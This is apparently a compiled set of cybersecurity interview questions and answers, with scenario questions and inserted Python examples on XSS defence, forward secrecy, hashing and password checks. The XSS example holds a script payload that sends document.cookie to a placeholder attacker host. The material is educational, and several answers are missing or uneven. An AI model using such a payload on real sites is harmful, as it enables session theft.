Cyber Security Interviews Questions

Uploaded by rockyyyy884

1. What are the common Cyberattacks?

Some common cyber attacks are as follows:
• Phishing: Phishing is the fraudulent practice of sending emails (or
other messages) that impersonate a legitimate source in order to trick
the recipient into revealing credentials, making a payment, or opening
a malicious link or attachment.
• Social Engineering Attacks: Social engineering attacks manipulate
people rather than technology. They can take many forms (pretexting,
baiting, tailgating, vishing) and can be carried out anywhere human
interaction is required.
• Ransomware: Ransomware is malware that encrypts the files on a
targeted system using strong cryptography and demands a ransom payment
for the decryption key; modern variants also steal the data and
threaten to publish it.
• Cryptocurrency Hijacking (cryptojacking): As cryptocurrencies and
mining have become more popular, so has their abuse. Attackers plant
mining code on victims' computers or in compromised web pages and use
the stolen CPU/GPU time to mine currencies such as Bitcoin, Ethereum,
Monero, and Litecoin.
• Botnet Attacks: A botnet is a large set of compromised devices under
an attacker's remote control. Botnets are used to launch DDoS attacks,
send spam, and spread malware, and often target large organizations
that hold vast amounts of data.
2. What are the elements of cyber security?
There are various elements of cyber security as given below:
• Application Security: Application security is a core component of
cyber security. It means building security features into applications
during the development phase (and testing for flaws) so that the
application can defend itself against cyber attacks.
• Information Security: Information security is the component of cyber
security that describes how information is protected against
unauthorized access, use, disclosure, disruption, alteration, or
deletion.
• Network Security: Network security is the protection of a network
against unauthorized access and threats. It is the network
administrator's responsibility to take precautions (segmentation,
firewalls, monitoring) to protect the network from potential security
threats.
3. Define DNS?

The Domain Name System (DNS) translates domain names into the IP
addresses that browsers use to load web pages. Every device connected
to the Internet has its own IP address, and DNS lets users refer to a
host by name instead of by that address.

4. What is a Firewall?

A firewall is a hardware or software-based network security device
that monitors all incoming and outgoing traffic and accepts, denies, or
drops that traffic based on a defined set of security rules.

5. What is a VPN?

VPN stands for Virtual Private Network. A virtual private network
(VPN) is a technology that creates a secure, encrypted connection over
an insecure network like the Internet.

6. What are the different sources of malware?

• Worms: A worm is a type of malware that spreads rapidly from one
computer to another on its own, via email, file sharing, or by
exploiting vulnerable network services. Worms do not require a host
program or user action to execute.
• Spyware: Spyware is a type of malware that runs in the background of
your computer, collects sensitive data (keystrokes, credentials,
browsing activity), and reports this data to remote attackers.
7. How does email work?
8. What is the difference between active and passive cyber
attacks?
. Define encryption and decryption?
Encryption is the process of transforming an ordinary
message (plaintext) into a meaningless message
(ciphertext). Decryption is the process of transforming a
meaningless message (ciphertext) into its original form
(plaintext).
9. What is the difference between plaintext and cleartext?
10. What is a block cipher?
A block cipher converts plaintext to ciphertext one fixed-size block
of plaintext at a time. Block sizes are 64 bits (DES, 3DES) or, for
modern ciphers such as AES, 128 bits; messages longer than one block
are processed under a mode of operation. The classic modes are ECB
(Electronic Code Book) and CBC (Cipher Block Chaining); ECB encrypts
identical plaintext blocks to identical ciphertext blocks and so leaks
patterns, which is why CBC, CTR, or an authenticated mode such as GCM
is used in practice.
11. What is the Three-way handshake?
TCP uses a three-way handshake to establish reliable connections. The
connection is full-duplex, so each side must synchronize (SYN) its
initial sequence number and have it acknowledged (ACK) by the other
side. The exchange is done in three steps: the client sends SYN, the
server replies with SYN-ACK, and the client sends ACK.
12. How can identity theft be prevented?
Steps to prevent identity theft:
• Use strong passwords and don't share your PIN with anyone, on or off
the phone.
• Enable two-factor authentication for email. Protect every device
with its own password or screen lock.
• Do not install software from untrusted sources. Do not post
confidential information on social media.
17. What are some common Hashing functions?
A hash function maps an input key (numeric, text, or arbitrary bytes)
to a fixed-size value. The methods listed below are the classic ways of
building a hash-table index from a numeric key; they are not
cryptographic. In security, "hashing" usually means a cryptographic
hash such as SHA-256 or SHA-3 (or a password hash such as bcrypt or
PBKDF2), which must be one-way and collision-resistant.

The types of hash functions are given below:

1. Division Method.

2. Mid Square Method.

3. Folding Method.

4. Multiplication Method.

18. What do you mean by two-factor authentication?

Two-factor authentication (2FA) means verifying a user with two
independent factors of different types: something the user knows (a
password), something the user has (a phone app, hardware token, or
smart card), or something the user is (a fingerprint or face). Two
passwords are not 2FA. Two-factor authentication is used to ensure
that only legitimate users gain access to secure systems and to limit
the damage of a stolen password.
19. What does XSS stand for? How can it be prevented?

Cross-site scripting (XSS) is a vulnerability in web applications that
allows an attacker to inject script that runs in another user's browser
in the context of the vulnerable site, where it can steal session
cookies, perform actions as the user, or deface the page. Cross-site
scripting is one of the most prevalent security vulnerabilities on the
Internet today. It is prevented by encoding untrusted data for the
context in which it is output (HTML body, attribute, JavaScript, URL),
validating input, setting a Content Security Policy, and marking
session cookies HttpOnly.
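The following is an added example (not code from the original document) of the vulnerable pattern beside its hardened form: a server-side Python view that builds HTML from user input. The attacker payload, the example.com URLs and the header values are constructed for illustration.

```python
import html

# Constructed attacker input: a script that sends the victim's session cookie to the attacker.
PAYLOAD = '<script>fetch("https://evil.example/?c=" + document.cookie)</script>'


def render_greeting_unsafe(name: str) -> str:
    """VULNERABLE: untrusted input is concatenated straight into the HTML response,
    so a name containing <script> becomes executable code in the victim's browser."""
    return "<h1>Hello, " + name + "!</h1>"


def render_greeting_safe(name: str) -> str:
    """Output-encode for the HTML body context. quote=True also encodes " and ',
    so the same helper is safe inside a quoted attribute value."""
    return "<h1>Hello, " + html.escape(name, quote=True) + "!</h1>"


def render_profile_link_safe(url: str) -> str:
    """URL-in-attribute context: escaping alone does not stop javascript: URLs,
    so first allow only http(s) schemes, then encode for the attribute."""
    if not url.strip().lower().startswith(("http://", "https://")):
        url = "#"
    return '<a href="' + html.escape(url, quote=True) + '">profile</a>'


def hardening_headers() -> dict:
    """Defence in depth: a CSP that refuses inline script, and a session cookie that
    script cannot read even if some XSS slips through."""
    return {
        "Content-Security-Policy": "default-src 'self'; script-src 'self'; object-src 'none'",
        "Set-Cookie": "session=abc123; HttpOnly; Secure; SameSite=Lax",
    }
```

The encoding must match the output context: `html.escape` is correct for the HTML body and quoted attributes, but data placed inside a `<script>` block or a URL needs JavaScript or URL encoding respectively, and a template engine with auto-escaping is the reliable way to get this right everywhere.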

20. What do you mean by Shoulder Surfing?

A shoulder surfing attack describes a situation in which an attacker
physically looks at a device's screen or keyboard while the victim
enters a password or PIN, in order to obtain credentials or personal
information.

21. What is the difference between hashing and encryption?

22. Differentiate between Information security and information
assurance.

23. Write a difference between HTTPS and SSL.

• HTTPS: It is called Hypertext Transfer Protocol Secure. It is HTTP
carried over an SSL/TLS connection, so the HTTP traffic is encrypted
and the server is authenticated by a certificate.
• SSL: It is called Secure Sockets Layer. It is a cryptographic
protocol that secures a transport connection; all SSL versions are now
deprecated and have been replaced by TLS, though the name "SSL" is
still used informally for the TLS layer.

24. What do you mean by System Hardening?

System hardening is the process of making a system more secure by
reducing its attack surface: removing unneeded software and services,
closing unused ports, applying patches, disabling default accounts,
and enforcing a secure configuration baseline.

25. Differentiate between spear phishing and phishing.

Phishing: Phishing is a mass email attack that sends the same generic
lure to many recipients in the hope that some of them will respond.
Spear phishing: Spear phishing is a type of email attack that targets
specific individuals or organizations, using personal details about
the target to make the message convincing.

26. What do you mean by Perfect Forward Secrecy?

Perfect Forward Secrecy (PFS) is a property of key exchange in which
each session uses a fresh, temporary (ephemeral) key agreement between
the server and client, so that a later compromise of the server's
long-term private key does not let an attacker decrypt previously
recorded sessions. It is used in TLS (the ECDHE cipher suites), in
VoIP and calling apps, and in messaging apps where user privacy is
paramount.
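As an added example (not from the original document), the exchange below runs one ephemeral Diffie-Hellman handshake in which a long-term key only authenticates the ephemeral shares and never protects the data. The group parameters are an assumption for illustration (p = 2^255 - 19 is prime but is not a standard DH group; deployments use X25519 or RFC 7919 groups), and the long-term key is modelled as a pre-shared MAC key rather than a certificate signature.

```python
import hashlib
import hmac
import secrets

# Toy group (assumption, illustration only): real code uses X25519 or an RFC 7919 group.
P = 2 ** 255 - 19
G = 2


def ephemeral_keypair():
    """Fresh private exponent and public share for ONE session; never stored or reused."""
    priv = secrets.randbelow(P - 3) + 2            # 2 <= priv <= P-2
    return priv, pow(G, priv, P)


def shared_secret(priv: int, peer_pub: int) -> int:
    if not 1 < peer_pub < P - 1:                   # reject degenerate shares 0, 1, p-1
        raise ValueError("invalid public share")
    return pow(peer_pub, priv, P)


def derive_session_key(secret: int, transcript: bytes) -> bytes:
    """Bind the key to the handshake transcript so a tampered share changes the key."""
    return hashlib.sha256(secret.to_bytes(32, "big") + transcript).digest()


def authenticate(long_term_key: bytes, share: bytes) -> bytes:
    """The long-term key only vouches for the ephemeral share; it never encrypts data."""
    return hmac.new(long_term_key, share, hashlib.sha256).digest()


def handshake(long_term_key: bytes):
    """One client<->server session. Returns (client_key, server_key, transcript)."""
    a, A = ephemeral_keypair()                     # client's ephemeral pair
    b, B = ephemeral_keypair()                     # server's ephemeral pair
    A_bytes, B_bytes = A.to_bytes(32, "big"), B.to_bytes(32, "big")

    # On the wire: each side sends share || MAC(long_term_key, share).
    msg_client = (A_bytes, authenticate(long_term_key, A_bytes))
    msg_server = (B_bytes, authenticate(long_term_key, B_bytes))
    for share, tag in (msg_client, msg_server):    # each peer verifies before continuing
        if not hmac.compare_digest(authenticate(long_term_key, share), tag):
            raise ValueError("share failed authentication")

    transcript = A_bytes + B_bytes                 # everything a passive attacker records
    k_client = derive_session_key(shared_secret(a, B), transcript)
    k_server = derive_session_key(shared_secret(b, A), transcript)
    del a, b                                       # ephemeral exponents are discarded after use
    return k_client, k_server, transcript
```

An attacker who records the transcript and later steals `long_term_key` still holds neither ephemeral exponent, so the session key cannot be recomputed; that is the forward secrecy. Contrast this with RSA key transport in old TLS, where the recorded pre-master secret is encrypted to the long-term key and a later key theft decrypts every past session.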

27. How to prevent MITM?

29. What is Public Key Infrastructure?

30. What is Spoofing?

Spoofing is a type of attack on computing devices in which an
attacker impersonates a legitimate user, device, or service and
pretends to be someone else. This type of attack is performed to
compromise system security or steal user information.

Types of Spoofing:

• IP Spoofing: IP is the network protocol that carries packets over
the Internet. Every packet header includes a source IP address; in IP
spoofing the attacker forges that source address so that the packet
appears to come from a trusted host. It is used in DDoS amplification
and to bypass address-based access controls.

• ARP Spoofing: ARP spoofing (ARP poisoning) is a technique in which
the attacker sends forged ARP replies on a wired or wireless LAN,
binding a victim's IP address to the attacker's MAC address so that
the victim's traffic is redirected through the attacker.

• Email Spoofing: Email spoofing is the most common form of identity
forgery on the Internet. Phishers forge the From address and use
official logos and headers to send emails to many addresses
impersonating bank, corporate, and law enforcement officials.
Q2. What is the difference between Worms and Viruses?
The key differences between worms and viruses are as follows:

Parameter   Worm                                        Virus
Definition  A form of malware that replicates itself    Executable code that attaches to another
            to spread to different computers across a   executable file to modify or delete
            network.                                    data.
Host        It does not need a host file to spread to   It needs a host file to spread on a
            a device.                                   device.
Objective   Its objective is to consume computer        Its objective is to modify information.
            resources like memory and bandwidth.
Speed       It can spread very quickly over a network.  It spreads slowly as compared to worms.
Effect      It is less harmful because it affects the   It is more harmful because it can access
            speed of the computer.                      and modify sensitive information such as
                                                        passwords.

9. What is the role of cybersecurity in compliance and regulations?

The primary aim of compliance is to ensure that an organization is
adhering to the specified laws, guidelines, and policies. In the context
of cybersecurity, regulations and compliance standards set the
minimum acceptable security requirements that an organization is
required to meet.

10. What are the essential skills needed for a career in cybersecurity?

12. What is a vulnerability?

A vulnerability is any weakness in a computer system, network, or
software that leaves it open to exploitation by a cyber attacker.

13. What is a DDoS attack?

One widely used means of attack is the DDoS attack, also known as
the distributed denial-of-service attack. It is a kind of cyber attack
that aims to disrupt the availability of targeted computer systems,
networks, or services by overwhelming them with a flood of
malicious traffic or resource-consuming requests.

14. What is the difference between symmetric and asymmetric
encryption?
15. What is a honeypot?

A honeypot is a tool used in the field of cybersecurity to detect and
deflect attacks from malicious actors. It is a decoy system that mimics
a legitimate system to lure in attackers.

What is Cyber Threat Intelligence?

Cyber Threat Intelligence, also known as Threat Intelligence, refers
to the strategic information that an organization uses to comprehend
the current or probable cyber risks that may impact its network and
assets.

17. What is the role of a Security Operations Center (SOC)?

A Security Operations Center (SOC) is the department responsible
for regular monitoring of an organization’s network and investigating
any potential issues.

19. What is the difference between a vulnerability and a risk?

A vulnerability is a weakness in a system, while a risk is the
likelihood of an attacker exploiting the vulnerability combined with
the impact that exploitation would have. There are four types of
vulnerabilities: network, operating system, process, and human
negligence.

Risks are of two types, external and internal. External risks are
associated with someone outside the organization, whereas internal
risks come from insiders with malicious intent or lack of knowledge
or training.

1. How are firewalls essential for network security?

Sample Answer: Firewalls block unauthorized access by acting as a
protective barrier and overseeing inbound and outbound traffic
according to the security rules.

2. How can you secure a computer network?

Sample Answer: Regularly updating the system, using strong
passwords and firewalls, and implementing intrusion detection
systems can help secure a computer network.

5. What is DNS?

Sample Answer: The Domain Name System is the distributed, hierarchical
directory of the internet. It translates website names into IP
addresses, which computers use to find and connect to websites.

6. What are the different types of malware?

7. What do you mean by a Null Session?

A null session is an anonymous connection to a Windows system’s IPC$
share over SMB/CIFS, made with an empty username and password. On
older or misconfigured systems it lets an unauthenticated user
enumerate user accounts, groups, shares, and policies, which is why
null sessions are treated as a vulnerability in the Common Internet
File System (CIFS) or SMB implementation of the operating system.

9. What would you do if you came across a security breach?

Sample Answer: I would isolate the compromised systems to contain the
breach and notify the parties affected by it. Additionally, I would
investigate the root cause of the incident, recover the affected
systems from a known-good state, and strengthen security in order to
prevent similar incidents.

Q10. What do you understand by cookies in a web browser?

Sample Answer: Cookies are small pieces of data stored by websites on
a user’s device. They are used to remember user preferences and
session state (a session cookie is what keeps a user logged in) and to
provide a more customized browsing experience. Additionally, cookies
are used to suggest websites or resources the user is more likely to
engage with.

. What are the various elements of cyber security?

5. Describe the concept of a VPN and its security benefits.

Answer:

A Virtual Private Network (VPN) creates a secure, encrypted
connection over a less secure network, such as the Internet.

Using a VPN enhances security by protecting sensitive data from
eavesdropping and allowing users to access resources securely,
especially when using public Wi-Fi.

7. Explain what an intrusion detection system (IDS) is.

Answer:

An Intrusion Detection System (IDS) monitors network traffic for
suspicious activity and potential threats, alerting administrators
when such activity is detected.

IDS can be classified as host-based or network-based, providing
insights into security breaches and helping organizations respond to
incidents effectively.

9. Describe the role of social engineering in cybersecurity attacks.

Social engineering involves manipulating individuals into divulging
confidential information or performing actions that compromise
security.

11. What is a security policy, and what should it include?

Answer:
A security policy is a formal document outlining an organization’s
approach to managing its information security.

It should include guidelines on acceptable use, access controls,
incident response, data protection measures, and employee
responsibilities, ensuring all stakeholders understand their roles in
maintaining security.

12. How does a man-in-the-middle attack work?

Answer:

A man-in-the-middle (MitM) attack occurs when an attacker secretly
places themselves between two communicating parties (for example by
ARP spoofing, a rogue Wi-Fi access point, or DNS spoofing), relays
their messages so that both still believe they are talking directly
to each other, and can read or alter the traffic in transit.

3. Explain the principle of least privilege.

Answer:

The principle of least privilege dictates that users should have the
minimum level of access necessary to perform their job functions.

Implementing this principle reduces the attack surface and limits the
potential damage from compromised accounts or insider threats.

17. How do SSL and TLS enhance web security?

Answer:
SSL (Secure Sockets Layer) and TLS (Transport Layer Security) are
cryptographic protocols that provide secure communication over the
Internet: they authenticate the server with a certificate, encrypt
the traffic, and protect it from tampering. TLS is the successor to
SSL; all SSL versions and TLS 1.0/1.1 are deprecated, so servers
should offer TLS 1.2 or 1.3.

18. What is a security incident response plan (IRP)?

Answer:

A security incident response plan (IRP) is a documented strategy
outlining how an organization will respond to security incidents.

20. How can organizations secure their cloud environments?

Answer:

Organizations can secure their cloud environments by implementing
strong access controls, data encryption, and regular security
assessments.

Using tools like cloud security posture management (CSPM) helps
identify misconfigurations, while adhering to compliance standards
ensures data protection in cloud environments.

21. What is a phishing simulation, and why is it beneficial?

Answer:

A phishing simulation is a training exercise where employees receive
simulated phishing emails to test their awareness and response.

22. Describe the difference between a vulnerability assessment and
a penetration test.

24. What is the purpose of a digital certificate?

Answer:

A digital certificate verifies the identity of an entity, ensuring that
public keys belong to the individual or organization they claim to
represent.

Digital certificates are essential for establishing trust in electronic
communications and are commonly used in SSL/TLS protocols for
secure web browsing.

25. How does a security information and event management (SIEM)
system work?

Answer:

A SIEM system collects and analyzes security data from across an
organization’s infrastructure to identify potential threats and
incidents.

28. How can you securely dispose of sensitive data?

Answer:

Securely disposing of sensitive data involves using methods like data
wiping, physical destruction of storage devices, or using certified
data destruction services.
These methods ensure that data cannot be recovered or accessed by
unauthorized individuals, maintaining confidentiality and compliance
with regulations.

29. What is the role of threat intelligence in cybersecurity?

Answer:

Threat intelligence involves gathering and analyzing information
about current and emerging threats to inform security decisions and
strategies.

33. What is a botnet, and how can it be used in attacks?

37. Describe the role of incident response teams (IRT).

Answer:

Incident response teams (IRT) are specialized groups within an
organization responsible for detecting, responding to, and recovering
from security incidents.

42. How do security audits contribute to an organization’s
cybersecurity posture?

Answer:

Security audits evaluate an organization’s security policies, practices,
and controls to identify weaknesses and ensure compliance with
regulations.

43. What is the role of a Chief Information Security Officer (CISO)?

Answer:

The Chief Information Security Officer (CISO) is responsible for
overseeing an organization’s information security strategy, policies,
and programs.

1. What is Cryptography?

Cryptography is the practice and study of techniques for securing
information and communication, mainly to protect the data from
third parties for whom the data is not intended.

3. What is the difference between IDS and IPS?

IDS is Intrusion Detection System and it only detects intrusions;
the administrator has to take care of preventing the intrusion.
Whereas, in IPS, i.e., Intrusion Prevention System, the system
detects the intrusion and also takes action to prevent the intrusion.

5. How is Encryption different from Hashing?

Both Encryption and Hashing are used to convert readable data into
an unreadable format. The difference is that the encrypted data can
be converted back to original data by the process of decryption but
the hashed data cannot be converted back to original data.
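The following is an added example (not code from the original document) of the hashing side of this comparison, which also covers the earlier question on hashing functions: it shows the properties that make a cryptographic hash usable for integrity and password storage (fixed output length, determinism, avalanche, no inverse) and the two things a bare hash does not give you, namely slow salted password storage (PBKDF2 here) and authenticity (HMAC). The SHA-256 digest of "abc" is the standard test vector; the password and message strings are constructed.

```python
import hashlib
import hmac
import os


def digest_hex(data: bytes) -> str:
    """Fixed-length, deterministic, one-way: there is no decrypt() for this value."""
    return hashlib.sha256(data).hexdigest()


def avalanche(msg_a: bytes, msg_b: bytes) -> int:
    """How many of the 256 output bits differ between the digests of two inputs;
    for a good hash a one-character change flips about half of them."""
    a, b = hashlib.sha256(msg_a).digest(), hashlib.sha256(msg_b).digest()
    return sum(bin(x ^ y).count("1") for x, y in zip(a, b))


def hash_password(password: str, salt: bytes = None, iterations: int = 600_000) -> str:
    """Store a slow, salted password hash, never the password and never a bare SHA-256.
    The salt makes identical passwords hash differently and defeats precomputed tables;
    the iteration count makes each guess expensive for an attacker with the database."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (iterations, salt.hex(), dk.hex())


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    algo, iterations, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unknown hash format")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


def tag(key: bytes, message: bytes) -> str:
    """A plain hash proves nothing about who produced it (anyone can recompute it);
    HMAC binds the digest to a secret key, giving integrity plus authenticity."""
    return hmac.new(key, message, hashlib.sha256).hexdigest()


def verify_tag(key: bytes, message: bytes, received: str) -> bool:
    return hmac.compare_digest(tag(key, message), received)
```

The iteration count of 600,000 follows current OWASP guidance for PBKDF2-HMAC-SHA256; bcrypt, scrypt or Argon2id are equally acceptable choices when a library for them is available. None of these functions can be "decrypted": a server verifies a password by hashing the candidate the same way and comparing.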

9. What are the response codes that can be received from a Web
Application?

1xx – Informational responses
2xx – Success
3xx – Redirection
4xx – Client-side error
5xx – Server-side error

10. What is traceroute? Why is it used?

Traceroute is a tool that shows the path of a packet to its
destination. It lists all the hops (mainly routers) that the packet
passes through, by sending probes with increasing TTL values and
recording which router returns each "time exceeded" message. It is
used mostly when a packet is not reaching its destination: traceroute
shows where the connection stops or breaks, identifying the point of
failure.

11. What is the difference between HIDS and NIDS?

HIDS (Host IDS) and NIDS (Network IDS) are both Intrusion Detection
Systems and work for the same purpose, i.e., to detect intrusions. The
difference is where they sit: a HIDS is installed on a particular
host/device and monitors that device’s traffic, logs, file integrity,
and suspicious system activity. A NIDS is placed on the network (for
example on a mirror port or tap) and monitors the traffic of all
devices on that network segment.

12. What are the steps to set up a firewall?

21. What do you understand by Risk, Vulnerability & Threat in a
network?

Threat: Someone or something with the potential to harm a system or an
organization
Vulnerability: Weakness in a system that can be exploited by a
potential hacker
Risk: Potential for loss or damage when a threat exploits a
vulnerability

25. How would you reset a password-protected BIOS
configuration?

Since BIOS is a pre-boot system it has its own storage mechanism
for settings and preferences. A simple way to reset is by removing
the CMOS battery (or shorting the board’s CLEAR CMOS jumper) so that
the memory storing the settings loses its power supply and, as a
result, loses its settings, including the password. Many laptops and
modern UEFI firmware keep the password in non-volatile flash, where
this does not work and a vendor procedure is needed.

35. What is data protection in transit vs data protection at rest?

Data protection in transit                  Data protection at rest
When data is moving from server to          When data just exists in its database
client over a network.                      or on its hard drive.
Effective data protection measures for      Data at rest is sometimes considered
in-transit data are critical, as data is    to be less vulnerable than data in
less secure when in motion.                 transit.

37. What is Cognitive Cybersecurity?

Cognitive Cybersecurity is an application of AI technologies
patterned on human thought processes to detect threats and
protect physical and digital systems.

Self-learning security systems use data mining, pattern recognition,
and natural language processing to simulate the human brain,
albeit in a high-powered computer model.

Part B – Scenario Based Cybersecurity Interview Questions

1. Here’s a situation- You receive the following email from the help
desk:

Dear XYZ Email user,

To create space for more users we’re deleting all inactive email
accounts. Here’s what you have to send to save your account from
getting deleted:

• Name (first and last):
• Email Login:
• Password:
• Date of birth:
• Alternate email

If we don’t receive the above information from you by the end of the
week, your email account will be terminated.

If you’re a user what do you do? Justify your answer.

This email is a classic example of “phishing” – trying to trick you
into “biting”. The justification is the generalized way of addressing
the receiver which is used in mass spam emails.

Above that, a corporate company will never ask for personal details
on mail.

They want your information. Don’t respond to email, instant
messages (IM), texts, phone calls, etc., asking you for your
password or other private information.

You should never disclose your password to anyone, even if they
say they work for UCSC, ITS, or other campus organizations.

2. A friend of yours sends an e-card to your mail. You have to click
on the attachment to get the card.

What do you do? Justify your answer

There are four risks here:

• Some attachments contain viruses or other malicious
programs, so just in general, it’s risky to open unknown or
unsolicited attachments.
• Also, in some cases just clicking on a malicious link can infect
a computer, so unless you are sure a link is safe, don’t click on
it.
• Email addresses can be faked, so just because the email says it
is from someone you know, you can’t be certain of this without
checking with the person.
• Finally, some websites and links look legitimate, but they’re
really hoaxes designed to steal your information.

3. One of the staff members in XYZ subscribes to many free
magazines. Now, to activate her subscriptions one of the magazines
asked for her month of birth, the second asked for her year of birth,
and the other one asked for her maiden name.
What do you infer from this situation? Justify.

All three newsletters probably have the same parent company or
are distributed through the same service. The parent company or
service can combine individual pieces of seemingly-harmless
information and use or sell it for identity theft.

It is even possible that there is a fourth newsletter that asks for a
day of birth as one of the activation questions.

Often questions about personal information are optional. In addition
to being suspicious about situations like the one described here,
never provide personal information when it is not legitimately
necessary, or to people or companies you don’t personally know.

4. In our computing labs, print billing is often tied to the user’s
login. Sometimes people call to complain about bills for printing
they never did only to find out that the bills are, indeed, correct.

What do you infer from this situation? Justify.

Sometimes they realize they loaned their account to a friend who
couldn’t remember his/her password, and the friend did the
printing. Thus the charges. It’s also possible that somebody came in
behind them and used their account.

This is an issue with shared or public computers in general. If you
don’t log out of the computer properly when you leave, someone
else can come in behind you and retrieve what you were doing, use
your accounts, etc. Always log out of all accounts, quit programs,
and close browser windows before you walk away.

5. There is this case that happened in my computer lab. A friend of
mine used their Yahoo account at a computer lab on campus. She
ensured that her account was not left open before she left the lab.
Someone came after her and used the same browser to re-access
her account, and they started sending emails from it.
What do you think might be going on here?

The first person probably didn’t log out of her account, so the new
person could just go to history and access her account.

Another possibility is that she did log out, but didn’t clear her web
cache. (This is done through the browser menu to clear pages that
the browser has saved for future use.)

6. Two different offices on campus are working to straighten out an
error in an employee’s bank account due to a direct deposit mistake.

Office #1 emails the correct account and deposit information to
office #2, which promptly fixes the problem.

The employee confirms with the bank that everything has, indeed,
been straightened out.

What is wrong here?

Account and deposit information is sensitive data that could be
used for identity theft. Sending this or any kind of sensitive
information by email is very risky because email is typically not
private or secure. Anyone who knows how can access it anywhere
along its route.

As an alternative, the two offices could have called each other or
worked with ITS to send the information a more secure way.

7. The mouse on your computer screen starts to move around on its
own and click on things on your desktop. What do you do?

a) Call your co-workers over so they can see
b) Disconnect your computer from the network
c) Unplug your mouse
d) Tell your supervisor
e) Turn your computer off
f) Run anti-virus
g) All of the above

Select all the options that apply.

Right answer is B & D.

This is definitely suspicious. Immediately report the problem to your
supervisor and the ITS Support Center: [Link], 459-
HELP (4357), help@[Link] or Kerr Hall room 54, M-F 8AM-5PM

Also, since it seems possible that someone is controlling the
computer remotely, it is best if you can disconnect the computer
from the network (and turn off wireless if you have it) until help
arrives. If possible, don’t turn off the computer.

8. Below is a list of passwords pulled out of a database.

A. @#$)*&^%
B. akHGksmLN
C. UcSc4Evr!
D. Password1

Which of the following passwords meets UCSC’s password
requirements?

Answer is UcSc4Evr!

This is the only choice that meets all of the following UCSC
requirements:

At least 8 characters in length

Contains at least 3 of the following 4 types of characters: lower
case letters, upper case letters, numbers, special characters

Not a word preceded or followed by a digit
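As an added example (not from the original document), the three requirements above can be written as a checker and run over the four candidates. The small word list is a constructed stand-in; a real checker would load a full dictionary or query a breached-password service.

```python
import re
import string

MIN_LENGTH = 8
# Constructed stand-in for a real dictionary (assumption: production code loads a word list).
COMMON_WORDS = {"password", "welcome", "letmein", "qwerty", "admin", "summer", "dragon"}


def character_classes(pw: str) -> int:
    """Count how many of the four classes (lower, upper, digit, special) appear."""
    present = [
        any(c.islower() for c in pw),
        any(c.isupper() for c in pw),
        any(c.isdigit() for c in pw),
        any(c in string.punctuation for c in pw),
    ]
    return sum(present)


def is_word_with_digits(pw: str) -> bool:
    """'Password1' or '2Summer': a dictionary word merely preceded or followed by digits."""
    m = re.fullmatch(r"\d*([A-Za-z]+)\d*", pw)
    return bool(m) and m.group(1).lower() in COMMON_WORDS


def check_password(pw: str):
    """Return (ok, reasons) for the three requirements quoted above."""
    reasons = []
    if len(pw) < MIN_LENGTH:
        reasons.append("fewer than %d characters" % MIN_LENGTH)
    if character_classes(pw) < 3:
        reasons.append("fewer than 3 of the 4 character classes")
    if is_word_with_digits(pw):
        reasons.append("a dictionary word preceded or followed by digits")
    return (not reasons, reasons)


if __name__ == "__main__":
    for candidate in ["@#$)*&^%", "akHGksmLN", "UcSc4Evr!", "Password1"]:
        ok, why = check_password(candidate)
        print("%-12s %s %s" % (candidate, "OK" if ok else "REJECT", "; ".join(why)))
```

"Password1" is the instructive case: it satisfies the length and class rules and fails only the dictionary rule, which is why composition rules alone are weak. Current guidance (NIST SP 800-63B) favours length, a breached-password blocklist and no forced periodic rotation over character-class rules.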

9. You receive an email from your bank telling you there is a
problem with your account. The email provides instructions and a
link so you can log into your account and fix the problem.

What should you do?

Delete the email. Better yet, use the web client (e.g. gmail, yahoo
mail, etc.) and report it as spam or phishing, then delete it.

Any unsolicited email or phone call asking you to enter your account
information, disclose your password, financial account information,
social security number, or other personal or private information is
suspicious – even if it appears to be from a company you are familiar
with. Always contact the sender using a method you know is
legitimate to verify that the message is from them.

10. A while back, the IT folks got a number of complaints that one
of our campus computers was sending out Viagra spam. They
checked it out, and the reports were true: a hacker had installed a
program on the computer that made it automatically send out tons
of spam email without the computer owner’s knowledge.

How do you think the hacker got into the computer to set this up?

This was actually the result of a hacked password. Using passwords
that can’t be easily guessed, and protecting your passwords by not
sharing them or writing them down can help to prevent this.
Passwords should be at least 8 characters in length and use a
mixture of upper and lower case letters, numbers, and symbols.

Even though in this case it was a hacked password, other things
that could possibly lead to this are:

• Out of date patches/updates
• No anti-virus software or out of date anti-virus software

17. What is the concept of digital signature?

If you get an email, you probably don’t worry about whether it
is really from the person it says it’s from.
